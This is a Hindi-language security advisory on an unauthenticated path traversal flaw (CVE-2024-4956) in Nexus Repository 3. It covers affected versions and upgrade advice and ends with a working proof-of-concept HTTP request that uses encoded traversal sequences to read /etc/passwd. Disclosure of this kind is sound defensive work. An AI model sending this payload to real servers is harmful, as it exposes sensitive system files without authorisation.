
Nexus Repository 3 में बिना प्रमाणीकरण के Path Traversal
Nexus Repository Manager एक रिपॉजिटरी मैनेजर है जो विकास के लिए आवश्यक आर्टिफैक्ट्स को व्यवस्थित, संग्रहीत और वितरित करता है।
Nexus Repository 3 के 3.68.1 से पहले के संस्करणों में एक पाथ ट्रैवर्सल भेद्यता खोजी गई है। यह भेद्यता एक हमलावर को बिना किसी प्रमाणीकरण के Nexus Repository एप्लिकेशन के दायरे से बाहर के सिस्टम फ़ाइलों को डाउनलोड करने के लिए URL बनाने की अनुमति देती है। यह एक महत्वपूर्ण जोखिम उत्पन्न करती है, क्योंकि यह संवेदनशील सिस्टम फ़ाइलों को उजागर कर सकती है और संभावित रूप से उस वातावरण की सुरक्षा से समझौता कर सकती है जहाँ Nexus Repository स्थापित है।
इस भेद्यता को कम करने के लिए Nexus Repository को जल्द से जल्द संस्करण 3.68.1 या उसके बाद के संस्करण में अपडेट करने की अनुशंसा की जाती है।
भेद्यता के बारे में अधिक जानकारी और तकनीकी विवरण के लिए, कृपया निम्नलिखित लिंक देखें:
संदर्भ:
यह भेद्यता Sonatype Nexus Repository Manager के संस्करण 3.0 से 3.68.0 तक को प्रभावित करती है।
इस भेद्यता को समाप्त करने के लिए Nexus Repository को अपग्रेड करना अनुशंसित तरीका है। हालाँकि, उन परिनियोजनों के लिए तत्काल शमन विकल्प उपलब्ध हैं जो तुरंत अपग्रेड नहीं कर सकते:
संदर्भ:
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
उपर्युक्त PoC के साथ, /etc/passwd फ़ाइल को एक्सेस किए जाने को देखना संभव है:

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml